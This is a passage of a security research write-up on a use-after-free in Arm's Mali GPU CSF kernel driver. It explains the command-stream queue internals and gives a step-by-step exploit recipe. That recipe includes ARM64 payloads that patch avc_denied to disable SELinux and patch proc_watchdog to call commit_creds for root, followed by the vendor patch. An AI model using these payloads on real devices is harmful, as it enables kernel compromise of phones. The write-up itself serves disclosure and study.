		<span class="n">queue</span><span class="o">-&gt;</span><span class="n">doorbell_nr</span> <span class="o">=</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">group</span><span class="o">-&gt;</span><span class="n">doorbell_nr</span><span class="p">;</span>

		<span class="cm">/* After this the real Hw doorbell page would be mapped in */</span>
		<span class="n">unmap_mapping_range</span><span class="p">(</span>
			<span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">csf</span><span class="p">.</span><span class="n">db_filp</span><span class="o">-&gt;</span><span class="n">f_inode</span><span class="o">-&gt;</span><span class="n">i_mapping</span><span class="p">,</span>
			<span class="n">queue</span><span class="o">-&gt;</span><span class="n">db_file_offset</span> <span class="o">&lt;&lt;</span> <span class="n">PAGE_SHIFT</span><span class="p">,</span>
			<span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Using the real hardware doorbell page (which only gets mapped in for scheduled queues), we
can notify the GPU that a particular command stream has more instructions pending execution.
This can be done by writing a value of 1 to offset 0 of the mapped doorbell page. The mapped
input page associated with a queue serves the purpose of indicating the offset in the queue’s
ring buffer where the GPU should execute instructions until when the queue is scheduled. This
is indicated by a 64-bit value that represents the offset from the start of the queue’s ring buffer.
Meanwhile, the mapped output page will indicate the offset where the GPU has previously
extracted instructions till. This is also a 64-bit value. The instructions lying between the extract
offset and the insert offset are what the GPU will execute next.</p>

<p><img src="/assets/mali-csf-exploit/fig5-user-io-pages.png" alt="The three mapped pages for a CSF queue. The hardware doorbell page (written by user): writing 1 to offset 0 notifies the GPU of pending instructions in the queue buffer. The user input page (written by user): write the offset (INSERT_OFFSET; 64-bit value) to execute instructions till at page offset 0. The user output page (written by GPU): GPU writes the offset (EXTRACT_OFFSET; 64-bit value) that it has executed till at page offset 0." /></p>

<p>To get the CSF scheduler to schedule a particular queue group for execution, we can use the
ioctl <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_KICK</code>. This triggers <code class="language-plaintext highlighter-rouge">kbase_csf_queue_kick</code> which finds the
queue which uses the region as a ring buffer and sets <code class="language-plaintext highlighter-rouge">queue-&gt;pending</code> to 1.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_csf_queue_kick</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		 <span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_kick</span> <span class="o">*</span><span class="n">kick</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">region</span> <span class="o">=</span> <span class="n">kbase_region_tracker_find_region_enclosing_address</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">kick</span><span class="o">-&gt;</span><span class="n">buffer_gpu_addr</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">kbase_is_region_invalid_or_free</span><span class="p">(</span><span class="n">region</span><span class="p">))</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span> <span class="o">=</span> <span class="n">region</span><span class="o">-&gt;</span><span class="n">user_data</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">queue</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">atomic_cmpxchg</span><span class="p">(</span><span class="o">&amp;</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">pending</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
			<span class="n">trigger_submission</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">(</span><span class="n">trigger_submission</span><span class="p">))</span>
		<span class="n">enqueue_gpu_submission_work</span><span class="p">(</span><span class="n">kctx</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The handler for the work submitted by <code class="language-plaintext highlighter-rouge">enqueue_gpu_submission_work</code> is
<code class="language-plaintext highlighter-rouge">pending_submission_worker</code>. This schedules the pending queues for submission to the GPU
using <code class="language-plaintext highlighter-rouge">kbase_csf_scheduler_queue_start</code> [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">pending_submission_worker</span><span class="p">(</span><span class="k">struct</span> <span class="n">work_struct</span> <span class="o">*</span><span class="n">work</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="cm">/* Iterate through the queue list and schedule the pending ones for submission. */</span>
	<span class="n">list_for_each_entry</span><span class="p">(</span><span class="n">queue</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">csf</span><span class="p">.</span><span class="n">queue_list</span><span class="p">,</span> <span class="n">link</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">atomic_cmpxchg</span><span class="p">(</span><span class="o">&amp;</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">pending</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
			<span class="k">struct</span> <span class="n">kbase_queue_group</span> <span class="o">*</span><span class="n">group</span> <span class="o">=</span>
				<span class="n">get_bound_queue_group</span><span class="p">(</span><span class="n">queue</span><span class="p">);</span>

			<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">group</span> <span class="o">||</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">bind_state</span> <span class="o">!=</span> <span class="n">KBASE_CSF_QUEUE_BOUND</span><span class="p">)</span>
				<span class="n">dev_dbg</span><span class="p">(</span><span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">dev</span><span class="p">,</span> <span class="s">"queue is not bound to a group"</span><span class="p">);</span>
			<span class="k">else</span>
				<span class="n">WARN_ON</span><span class="p">(</span><span class="n">kbase_csf_scheduler_queue_start</span><span class="p">(</span><span class="n">queue</span><span class="p">));</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">kbase_csf_scheduler_queue_start</code> schedules the queue’s group and then uses
<code class="language-plaintext highlighter-rouge">start_stream_sync</code> to call <code class="language-plaintext highlighter-rouge">program_cs</code> that programs the command stream information
associated with the queue into pages shared with the CSF firmware.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">start_stream_sync</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">program_cs</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">queue</span><span class="p">,</span> <span class="nb">true</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_csf_scheduler_queue_start</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">kbase_queue_group</span> <span class="o">*</span><span class="n">group</span> <span class="o">=</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">group</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span> <span class="o">=</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">kbdev</span><span class="p">;</span>
	<span class="n">bool</span> <span class="k">const</span> <span class="n">cs_enabled</span> <span class="o">=</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">enabled</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">group</span><span class="o">-&gt;</span><span class="n">run_state</span> <span class="o">==</span> <span class="n">KBASE_CSF_GROUP_FAULT_EVICTED</span><span class="p">)</span> <span class="p">{</span>
	<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">((</span><span class="n">group</span><span class="o">-&gt;</span><span class="n">run_state</span> <span class="o">==</span>
         <span class="n">KBASE_CSF_GROUP_SUSPENDED_ON_WAIT_SYNC</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="n">err</span> <span class="o">=</span> <span class="n">scheduler_group_schedule</span><span class="p">(</span><span class="n">group</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">kbasep_csf_scheduler_group_is_on_slot_locked</span><span class="p">(</span><span class="n">group</span><span class="p">))</span> <span class="p">{</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">cs_enabled</span><span class="p">)</span> <span class="p">{</span>
				<span class="p">...</span>
				<span class="n">kbase_csf_ring_cs_kernel_doorbell</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span>
					<span class="n">queue</span><span class="o">-&gt;</span><span class="n">csi_index</span><span class="p">,</span> <span class="n">group</span><span class="o">-&gt;</span><span class="n">csg_nr</span><span class="p">,</span>
					<span class="nb">true</span><span class="p">);</span>
				<span class="p">...</span>
			<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
				<span class="n">start_stream_sync</span><span class="p">(</span><span class="n">queue</span><span class="p">);</span>
			<span class="p">}</span>
		<span class="p">}</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Tying all the pieces together, we need to do the following in order to execute a series of
instructions on the CSF GPU:</p>

<ol>
  <li>Place GPU instructions in the queue’s ring buffer</li>
  <li>Write the next <code class="language-plaintext highlighter-rouge">&lt;INSERT_OFFSET&gt;</code> in the user input page</li>
  <li>Call the <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_KICK</code> ioctl to schedule the queue and notify the GPU
of pending instructions.</li>
  <li>Optionally, add more instructions into the queue, write the new <code class="language-plaintext highlighter-rouge">&lt;INSERT_OFFSET&gt;</code> and
write a value of 1 to the mapped hardware doorbell page to notify the GPU of more
instructions pending.</li>
</ol>

<p>Note: each GPU instruction corresponds to an offset of 8 as instructions are 8 bytes long.</p>

<p>As an example, the following figures show a submission of 3 instructions followed by a
submission of 5 instructions in a ring buffer of size 64.</p>

<p><img src="/assets/mali-csf-exploit/fig6-ring-buffer-submission.png" alt="Ring buffer of size 64. Top: extract offset at 0, insert offset at (3 * 8) % 64 = 24, with three instructions to be executed. Bottom: after submitting five more, insert offset at (8 * 8) % 64 = 0 and extract offset at 3 * 8 = 24; the first three are executed instructions, the remaining are instructions to be executed, and the rest is unused buffer region." /></p>

<h1 id="the-exploit">The exploit</h1>

<p>To recap, we trigger the vulnerability and then allocate a memory region with 513 pages (which will henceforth be
referred to as “controlled region”) in order to let our controlled physical page be reused as a level 3
PGD. The next step is to redirect the underlying physical page to point to a page in the kernel
text section and we have to craft a fake ATE that we can use to overwrite an entry in the
controlled PGD. ATEs at level 3 in the Mali memory management code have the 2 least
significant bits (LSBs) set while entries at other levels only have the least significant bit set.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define ENTRY_IS_ATE_L3		3ULL
#define ENTRY_IS_ATE_L02	1ULL
#define ENTRY_ACCESS_BIT (1ULL &lt;&lt; 10)
</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">entry_set_ate</span><span class="p">(</span><span class="n">u64</span> <span class="o">*</span><span class="n">entry</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">tagged_addr</span> <span class="n">phy</span><span class="p">,</span>
		<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span>
		<span class="kt">int</span> <span class="k">const</span> <span class="n">level</span><span class="p">,</span> <span class="kt">int</span> <span class="n">inserted_nr_pages</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">level</span> <span class="o">==</span> <span class="n">MIDGARD_MMU_BOTTOMLEVEL</span><span class="p">)</span>
		<span class="n">page_table_entry_set</span><span class="p">(</span><span class="n">entry</span><span class="p">,</span> <span class="n">as_phys_addr_t</span><span class="p">(</span><span class="n">phy</span><span class="p">)</span> <span class="o">|</span>
				<span class="n">get_mmu_flags</span><span class="p">(</span><span class="n">flags</span><span class="p">,</span> <span class="n">inserted_nr_pages</span><span class="p">)</span> <span class="o">|</span>
				<span class="n">ENTRY_ACCESS_BIT</span> <span class="o">|</span> <span class="n">ENTRY_IS_ATE_L3</span><span class="p">);</span>
	<span class="k">else</span>
		<span class="n">page_table_entry_set</span><span class="p">(</span><span class="n">entry</span><span class="p">,</span> <span class="n">as_phys_addr_t</span><span class="p">(</span><span class="n">phy</span><span class="p">)</span> <span class="o">|</span>
				<span class="n">get_mmu_flags</span><span class="p">(</span><span class="n">flags</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">|</span>
				<span class="n">ENTRY_ACCESS_BIT</span> <span class="o">|</span> <span class="n">ENTRY_IS_ATE_L02</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">mmu_flags</code> for the ATE depend on the flags set for the region and in the context of the exploit it has the
value 0x40. Writing this new ATE to offset 0 in the first page of the alias region will essentially
overwrite the first ATE entry in the level 3 PGD of the controlled region. Subsequent writes to
the first page of the controlled region will now overwrite the physical memory corresponding to
that page in the kernel text region, allowing us to overwrite any kernel function in the page. We
will first have to disable SELinux before attempting to commit new credentials for a privilege escalation so we will point the fake ATE to the page containing the function <code class="language-plaintext highlighter-rouge">avc_denied</code>, which is used during permission
checking to return a verdict on whether access should be denied.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">noinline</span> <span class="kt">int</span> <span class="nf">avc_denied</span><span class="p">(</span><span class="k">struct</span> <span class="n">selinux_state</span> <span class="o">*</span><span class="n">state</span><span class="p">,</span>
		       <span class="n">u32</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">u32</span> <span class="n">tsid</span><span class="p">,</span>
		       <span class="n">u16</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">u32</span> <span class="n">requested</span><span class="p">,</span>
		       <span class="n">u8</span> <span class="n">driver</span><span class="p">,</span> <span class="n">u8</span> <span class="n">xperm</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
		       <span class="k">struct</span> <span class="n">av_decision</span> <span class="o">*</span><span class="n">avd</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">AVC_STRICT</span><span class="p">)</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">enforcing_enabled</span><span class="p">(</span><span class="n">state</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
	    <span class="o">!</span><span class="p">(</span><span class="n">avd</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">AVD_FLAGS_PERMISSIVE</span><span class="p">))</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>

	<span class="n">avc_update_node</span><span class="p">(</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">avc</span><span class="p">,</span> <span class="n">AVC_CALLBACK_GRANT</span><span class="p">,</span> <span class="n">requested</span><span class="p">,</span> <span class="n">driver</span><span class="p">,</span>
			<span class="n">xperm</span><span class="p">,</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">tsid</span><span class="p">,</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">avd</span><span class="o">-&gt;</span><span class="n">seqno</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This function can be overwritten by writing to the correct offset in the first page of the controlled
region. The payload used for this is:</p>

<div class="language-armasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">str</span> <span class="nb">xzr</span><span class="err">,</span> <span class="o">[</span><span class="nv">x0</span><span class="o">]</span>
<span class="nl">mov</span> <span class="nb">x0</span><span class="err">,</span> <span class="mi">0</span>
<span class="nl">ret</span>
</code></pre></div></div>

<p>This will set enforcing to 0 in <code class="language-plaintext highlighter-rouge">struct selinux_state</code> (the first argument) and get the function to return 0. Opening any file where access is usually denied, for instance <code class="language-plaintext highlighter-rouge">/proc/sys/kernel/hostname</code>, will invoke <code class="language-plaintext highlighter-rouge">avc_denied</code> and disable SELinux.</p>

<p>Next, all that remains is to call <code class="language-plaintext highlighter-rouge">commit_creds</code> with <code class="language-plaintext highlighter-rouge">init_cred</code> and spawn a root shell. This
time, we craft a fake ATE that points to a function that can be called easily from userspace and
can be overwritten without affecting core kernel functionality. This can be any handler function
for sysfs (e.g. <code class="language-plaintext highlighter-rouge">sel_open_handle_status</code>) or the <code class="language-plaintext highlighter-rouge">sysctl</code> interface in <code class="language-plaintext highlighter-rouge">procfs</code> and I chose the
<code class="language-plaintext highlighter-rouge">proc_watchdog</code> function, which handles access to the kernel parameter
<code class="language-plaintext highlighter-rouge">/proc/sys/kernel/watchdog</code>. The first ATE in the controlled
level 3 PGD is overwritten with this fake ATE such that a GPU write to that GPU VA will overwrite the <code class="language-plaintext highlighter-rouge">proc_watchdog</code> function. Next, the payload to overwrite the function is written to the controlled region like
before by using GPU instructions. The payload is effectively the following:</p>

<div class="language-armasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">//</span> <span class="nf">Save</span> <span class="nv">stack</span><span class="o">,</span> <span class="nv">prepare</span> <span class="nv">x0</span> <span class="nv">with</span> <span class="nv">init_cred</span>
<span class="nl">stp</span> <span class="nb">x29</span><span class="err">,</span> <span class="nv">x30</span><span class="o">,</span> <span class="o">[</span><span class="nv">sp</span><span class="o">,</span> <span class="o">-</span><span class="mi">16</span><span class="o">]!</span>
<span class="nl">mov</span> <span class="nb">x0</span><span class="err">,</span> <span class="nv">xzr</span>
<span class="nl">adrp</span> <span class="nb">x0</span><span class="err">,</span> <span class="nv">init_cred_page</span>
<span class="nl">add</span> <span class="nb">x0</span><span class="err">,</span> <span class="nv">init_cred_offset_in_page</span>

<span class="err">//</span> <span class="nf">Prepare</span> <span class="nv">x9</span> <span class="nv">with</span> <span class="nv">commit_cred</span> <span class="nv">address</span>
<span class="nl">mov</span> <span class="nb">x9</span><span class="err">,</span> <span class="nv">xzr</span>
<span class="nl">adrp</span> <span class="nb">x9</span><span class="err">,</span> <span class="nv">commit_cred_page</span>
<span class="nl">add</span> <span class="nb">x9</span><span class="err">,</span> <span class="nv">commit_cred_offset_in_page</span>

<span class="err">//</span> <span class="nf">Call</span> <span class="nv">commit_creds</span>
<span class="nl">blr</span> <span class="nb">x9</span>

<span class="err">//</span> <span class="nf">Restore</span> <span class="nv">stack</span>
<span class="nl">ldp</span> <span class="nb">x29</span><span class="err">,</span> <span class="nv">x30</span><span class="o">,</span> <span class="o">[</span><span class="nv">sp</span><span class="o">],</span> <span class="mi">16</span>
<span class="nl">mov</span> <span class="nb">x0</span><span class="err">,</span> <span class="nv">xzr</span>
<span class="nl">ret</span>
</code></pre></div></div>

<p>This is then triggered by opening <code class="language-plaintext highlighter-rouge">/proc/sys/kernel/watchdog</code> and reading from it. After this,
all that remains is to spawn a shell as root.</p>

<p>The full exploit in summary is:</p>

<ol>
  <li>Other routine setup steps for a new <code class="language-plaintext highlighter-rouge">kbase_context</code> (ioctls for version check, setting
flags).</li>
  <li>Initialize the JIT configurations for the <code class="language-plaintext highlighter-rouge">kbase_context</code> using
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_JIT_INIT</code> ioctl.</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to allocate a new region by submitting a command to a kcpu
queue</li>
  <li>Make the region inactive using <code class="language-plaintext highlighter-rouge">kbase_jit_free</code>.</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to reuse the same region by specifying the same <code class="language-plaintext highlighter-rouge">usage_id</code>,
and set a lower value for <code class="language-plaintext highlighter-rouge">initial_commit</code> for the region.</li>
  <li>Use <code class="language-plaintext highlighter-rouge">csf_queue_register_internal</code> (through <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_REGISTER</code>
ioctl) to register a queue using the JIT region’s GPU address.</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_csf_queue_terminate</code> (through <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_TERMINATE</code> ioctl)
to terminate the queue and remove the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag on the JIT
region.</li>
  <li>Create an alias to the JIT region using <code class="language-plaintext highlighter-rouge">mem_alias</code> (through <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_ALIAS</code>
ioctl) such that the alias region’s GPU VA pages are mapped to the backing physical
pages of the JIT region.</li>
  <li>Allocate and <code class="language-plaintext highlighter-rouge">mmap</code> 16384 pages with a single <code class="language-plaintext highlighter-rouge">mem_alloc</code> operation followed by <code class="language-plaintext highlighter-rouge">munmap</code>
to fill up the <code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> fully such that a subsequent freeing of pages will
be freed to <code class="language-plaintext highlighter-rouge">kbase_device</code> <code class="language-plaintext highlighter-rouge">mem_pool</code>.</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> to shrink the JIT region’s backing pages through
<code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code>. The freed pages will be spliced onto the start of the page list in the
<code class="language-plaintext highlighter-rouge">kbase_device</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> and the alias region still contains valid page table entries to
the freed physical pages. The pages are now in a UAF state.</li>
  <li>Allocate a memory region for performing arbitrary writes (i.e. the controlled region).</li>
  <li>Set up a CSF command stream queue by allocating memory for the ring buffer,
registering the queue, creating a queue group and binding the queue to the group. Next,
set up the hardware doorbell page, user input page and user output page.</li>
  <li>[ Command submission ] Overwrite the level 3 PGD entry of the controlled region with an ATE encoding the
physical page containing <code class="language-plaintext highlighter-rouge">avc_denied</code>, by writing to the alias
region. Subsequently, write to the offset of <code class="language-plaintext highlighter-rouge">avc_denied</code> within its page in the controlled
region to overwrite the function with instructions that disable SELinux.</li>
  <li>Open <code class="language-plaintext highlighter-rouge">/proc/sys/kernel/hostname</code> to trigger <code class="language-plaintext highlighter-rouge">avc_denied</code> to disable SELinux.</li>
  <li>[ Command submission ] Overwrite the level 3 PGD entry of the controlled region with an ATE encoding the
physical page containing <code class="language-plaintext highlighter-rouge">proc_watchdog</code>, by writing to the alias
region. Subsequently, write to the offset of <code class="language-plaintext highlighter-rouge">proc_watchdog</code> within its page in the
controlled region to overwrite the function with instructions that call <code class="language-plaintext highlighter-rouge">commit_creds</code>.</li>
  <li>Open <code class="language-plaintext highlighter-rouge">/proc/sys/kernel/watchdog</code> to elevate our credentials.</li>
  <li>Spawn the root shell.</li>
</ol>

<h1 id="patch">Patch</h1>

<p>Arm released a patch for the bug in the <code class="language-plaintext highlighter-rouge">r41p0</code> version of the Mali kernel drivers.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">---</span> <span class="n">a</span><span class="o">/</span><span class="n">mali_kbase</span><span class="o">/</span><span class="n">csf</span><span class="o">/</span><span class="n">mali_kbase_csf</span><span class="p">.</span><span class="n">c</span>
<span class="o">+++</span> <span class="n">b</span><span class="o">/</span><span class="n">mali_kbase</span><span class="o">/</span><span class="n">csf</span><span class="o">/</span><span class="n">mali_kbase_csf</span><span class="p">.</span><span class="n">c</span>
<span class="err">@@</span> <span class="o">-</span><span class="mi">506</span><span class="p">,</span><span class="mi">7</span> <span class="o">+</span><span class="mi">517</span><span class="p">,</span><span class="mi">8</span> <span class="err">@@</span>
 	<span class="n">region</span> <span class="o">=</span> <span class="n">kbase_region_tracker_find_region_enclosing_address</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span>
 								    <span class="n">queue_addr</span><span class="p">);</span>
 
<span class="o">-</span>	<span class="k">if</span> <span class="p">(</span><span class="n">kbase_is_region_invalid_or_free</span><span class="p">(</span><span class="n">region</span><span class="p">))</span> <span class="p">{</span>
<span class="o">+</span>	<span class="k">if</span> <span class="p">(</span><span class="n">kbase_is_region_invalid_or_free</span><span class="p">(</span><span class="n">region</span><span class="p">)</span> <span class="o">||</span> <span class="n">kbase_is_region_shrinkable</span><span class="p">(</span><span class="n">region</span><span class="p">)</span> <span class="o">||</span>
<span class="o">+</span>	    <span class="n">region</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">type</span> <span class="o">!=</span> <span class="n">KBASE_MEM_TYPE_NATIVE</span><span class="p">)</span> <span class="p">{</span>
 		<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
 		<span class="k">goto</span> <span class="n">out_unlock_vm</span><span class="p">;</span>
 	<span class="p">}</span>
</code></pre></div></div>

<p>The check in <code class="language-plaintext highlighter-rouge">kbase_is_region_shrinkable</code> prevents using active JIT regions as ring buffers for a CSF command stream queue, which fixes the root cause.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * kbase_is_region_shrinkable - Check if a region is "shrinkable".
 * A shrinkable regions is a region for which its backing pages (reg-&gt;gpu_alloc-&gt;pages)
 * can be freed at any point, even though the kbase_va_region structure itself
 * may have been refcounted.
 * Regions that aren't on a shrinker, but could be shrunk at any point in future
 * without warning are still considered "shrinkable" (e.g. Active JIT allocs)
 *
 * @reg: Pointer to region
 *
 * Return: true if the region is "shrinkable", false if not.
 */</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="n">bool</span> <span class="nf">kbase_is_region_shrinkable</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">return</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KBASE_REG_DONT_NEED</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KBASE_REG_ACTIVE_JIT_ALLOC</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <a href="https://android.googlesource.com/kernel/google-modules/gpu/+/422aa1fad7e63f16000ffb9303e816b54ef3d8ca">commit</a> for the patch shows that variants of the bug are fixed in two code paths that don’t properly handle the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag, namely the CSF queue component and the CSF tiler heap component.</p>

<h1 id="resources">Resources</h1>

<ul>
  <li><a href="https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/">https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/</a></li>
  <li><a href="https://gitlab.com/panfork/">https://gitlab.com/panfork/</a></li>
  <li><a href="https://gitlab.freedesktop.org/mesa/mesa/-/tree/main/src/panfrost">https://gitlab.freedesktop.org/mesa/mesa/-/tree/main/src/panfrost</a></li>
  <li><a href="https://www.kernel.org/doc/gorman/html/understand/understand006.html">https://www.kernel.org/doc/gorman/html/understand/understand006.html</a></li>
  <li><a href="https://www.arm.com/products/silicon-ip-multimedia/gpu/mali-g710">https://www.arm.com/products/silicon-ip-multimedia/gpu/mali-g710</a></li>
  <li><a href="https://www.anandtech.com/show/16694/arm-announces-new-malig710-g610-g510-g310-mobile-gpu-families">https://www.anandtech.com/show/16694/arm-announces-new-malig710-g610-g510-g310-mobile-gpu-families</a></li>
  <li><a href="https://www.collabora.com/news-and-blog/news-and-events/reverse-engineering-the-mali-g78.html">https://www.collabora.com/news-and-blog/news-and-events/reverse-engineering-the-mali-g78.html</a></li>
  <li><a href="https://project-zero.issues.chromium.org/issues/42451508">https://project-zero.issues.chromium.org/issues/42451508</a></li>
